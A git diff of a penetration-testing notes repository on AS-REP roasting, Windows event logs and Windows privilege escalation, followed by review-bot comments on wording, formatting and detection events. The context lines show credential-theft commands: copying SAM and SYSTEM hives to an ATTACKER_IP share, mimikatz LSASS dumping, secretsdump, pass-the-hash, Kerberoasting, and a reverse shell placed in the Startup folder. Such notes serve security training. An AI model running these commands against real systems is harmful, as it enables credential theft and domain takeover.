diff --git a/Enumeration/AS-REP Roasting.md b/Enumeration/AS-REP Roasting.md index eb5b8e2..5372191 100644 --- a/Enumeration/AS-REP Roasting.md +++ b/Enumeration/AS-REP Roasting.md @@ -1,4 +1,10 @@ -# AS-Rep Roating +# AS-Rep Roasting + +AS-REP Roasting targets account for which preauthentication is disabled. +This means `DONT_REQUIRE_PREAUTH` for an account is enabled, and the DC skips +the verification step. After event type `4768` the `Pre_Authentication_Type=0` +and event code `4769` and `4624` is never triggered. +A service can be requested without any password check. AS-Rep Roasting dumps user accounts which did not enable pre-authentication. This is somewhat similar to Kerberoasting but includes user accounts as well. diff --git a/Forensics/Windows Event Logs.md b/Forensics/Windows Event Logs.md index 952c0e0..51db21d 100644 --- a/Forensics/Windows Event Logs.md +++ b/Forensics/Windows Event Logs.md @@ -27,6 +27,7 @@ Get-WinEvent -FilterHashTable @{LogName='';ID=''} | fl * **1**: Process Creation (Applications & Services -> Microsoft -> Windows -> Sysmon -> Operational) +* **10**: ProcessAccess, Sysmon event where one process opens a handle to another process * **4688**: Process Creation (Windows Logs -> Security) ### Files diff --git a/Post Exploitation/Windows/Windows PrivEsc.md b/Post Exploitation/Windows/Windows PrivEsc.md index 6d6d2cb..32fcdee 100644 --- a/Post Exploitation/Windows/Windows PrivEsc.md +++ b/Post Exploitation/Windows/Windows PrivEsc.md @@ -145,7 +145,7 @@ sc start TheService ### Startup Application -* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` +* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` ### Password Mining 
@@ -184,7 +184,7 @@ C:\inetpub\wwwroot\web.config C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config ``` -### Putty +### Putty * Saved proxy password credentials may be found via ```sh @@ -294,7 +294,7 @@ secretsdump.py -sam sam.hive -system system.hive LOCAL hashdump ``` -* Use pass the hash to login +* Use pass the hash to login ```sh psexec.py -hashes administrator@$TARGET_IP ``` @@ -314,7 +314,7 @@ copy cmd.exe utilman.exe * It is a rouge potato * Execute process as another user * Service accounts operate through impersonation -* Check privileges via `whoami /priv` for these +* Check privileges via `whoami /priv` for these * __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker ```sh socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234 @@ -324,12 +324,14 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234 ### Volume Shadow Copy Service -* Take a look at the volumes at +Take a look at the volumes at + ```sh vssadmin list shadows ``` -* Copy `sam` and `system` from the shadow copy +Copy `sam` and `system` from the shadow copy + ```sh copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ 
@@ -337,10 +339,14 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sys ### Dump LSASS -* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile` +LSASS contains multiple different credential types like NTLM password hashes, +active krb session tickets, plaintext passwords and cached domain credentials. + +* If administrator permissions are gained, a dump file can be created by opening the task manager and right-clicking `lsass.exe` -> `creat dumpfile` * Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe` * Extract the dump via mimikatz + ```sh privilege::debug sekurlsa::logonpasswords @@ -387,7 +393,7 @@ sekurlsa::credman ### Ntdsutil * If administrative permissions on the DC have been gained this can be done -* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) +* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) #### Locally extracting ntds.dit @@ -411,7 +417,7 @@ secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local #### Remotely dumping ntds -* Needs the following AD credentials +* Needs the following AD credentials * Replicating Directory Changes * Replicating Directory Changes All * Replicating Directory Changes in Filtered Set @@ -469,7 +475,7 @@ net user GetUserSPNs.py -dc-ip $DC_IP / ``` -* Take a look at `Name` in the output and use it to query a TGS ticket +* Take a look at `Name` in the output and use it to query a TGS ticket ```sh GetUserSPNs.py -dc-ip $DC_IP / -request-user ```
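Review bot: the new paragraph in the `Enumeration/AS-REP Roasting.md` hunk has a grammar slip and two statements that will mislead readers. `targets account for which preauthentication is disabled` should read `targets accounts for which ...`. The sentence `After event type 4768 the Pre_Authentication_Type=0 and event code 4769 and 4624 is never triggered` reads as if 4768 suppresses the other events; suggest phrasing it as the detection rule it is meant to be: a `4768` (TGT request) whose `Pre-Authentication Type` is `0`, for an account with `DONT_REQUIRE_PREAUTH` set, and no following `4769` or `4624` for that principal, is the signature to alert on. The closing line `A service can be requested without any password check` overstates it: the DC hands back the AS-REP without the client proving knowledge of the password, but the encrypted part still has to be cracked offline before it is of any use, which is why the 4768 is the only trace left on the DC. The paragraph also repeats the unchanged line `AS-Rep Roasting dumps user accounts which did not enable pre-authentication`; merge the two. Minor: the heading spells it `AS-Rep` while the body uses `AS-REP`; pick one.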
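Review bot: the added entry `* **10**: ProcessAccess, Sysmon event where one process opens a handle to another process` in the `Forensics/Windows Event Logs.md` hunk breaks the list's format: the neighbouring entries give the event name and then the log location in parentheses, e.g. `* **1**: Process Creation (Applications & Services -> Microsoft -> Windows -> Sysmon -> Operational)`. Suggest `* **10**: Process Access, one process opens a handle to another (Applications & Services -> Microsoft -> Windows -> Sysmon -> Operational)` so the reader knows where to look. Worth a clause saying this is the event to watch for handles opened on `lsass.exe`, since the `### Dump LSASS` section touched later in this patch describes exactly that action.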
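Review bot: the `@@ -145,7 +145,7 @@` hunk in `Post Exploitation/Windows/Windows PrivEsc.md` only strips trailing whitespace, as do the `### Putty`, `Use pass the hash to login`, `whoami /priv`, `### Ntdsutil`, `Remotely dumping ntds` and `GetUserSPNs` hunks; mixing seven whitespace-only hunks with the content changes makes the diff harder to review. Suggest a separate whitespace-only commit, or an editor setting that strips trailing whitespace file-wide so it is done once.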
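Review bot: the `### Volume Shadow Copy Service` hunk turns `* Take a look at the volumes at` and `* Copy `sam` and `system` from the shadow copy` into plain paragraphs, but every other step-plus-command pairing in this file keeps the bullet directly in front of its code fence (`* Use pass the hash to login`, `* Take a look at `Name` in the output and use it to query a TGS ticket`). Either apply the same change across the file or keep the bullets here; adding the blank line before the fence is fine either way.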
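Review bot: in the `### Dump LSASS` hunk, `right clicking` becomes `right-clicking` but the same line still says `creat dumpfile`; the Task Manager menu item is `Create dump file`. The context line below it has `sysinternal suite` and `tskmgr.exe`, which should be `Sysinternals suite` and `taskmgr.exe`. In the new paragraph, `active krb session tickets` should be spelled out as Kerberos tickets. Since the section now explains what LSASS holds, it is also the place to mention the detection side: the Sysmon `ProcessAccess` event 10 added in this same patch fires when a process opens a handle to `lsass.exe`, which both the Task Manager dump and `procdump.exe` do, so defenders reading this file know which event to alert on.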
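Review bot: while `* Needs the following AD credentials` is being touched in the `#### Remotely dumping ntds` hunk, fix the wording: the three `Replicating Directory Changes` items listed under it are extended rights granted on the domain object, not credentials. Suggest `* The account used needs the following rights on the domain:`, which is also what a defender should audit for when reviewing who can pull the database remotely.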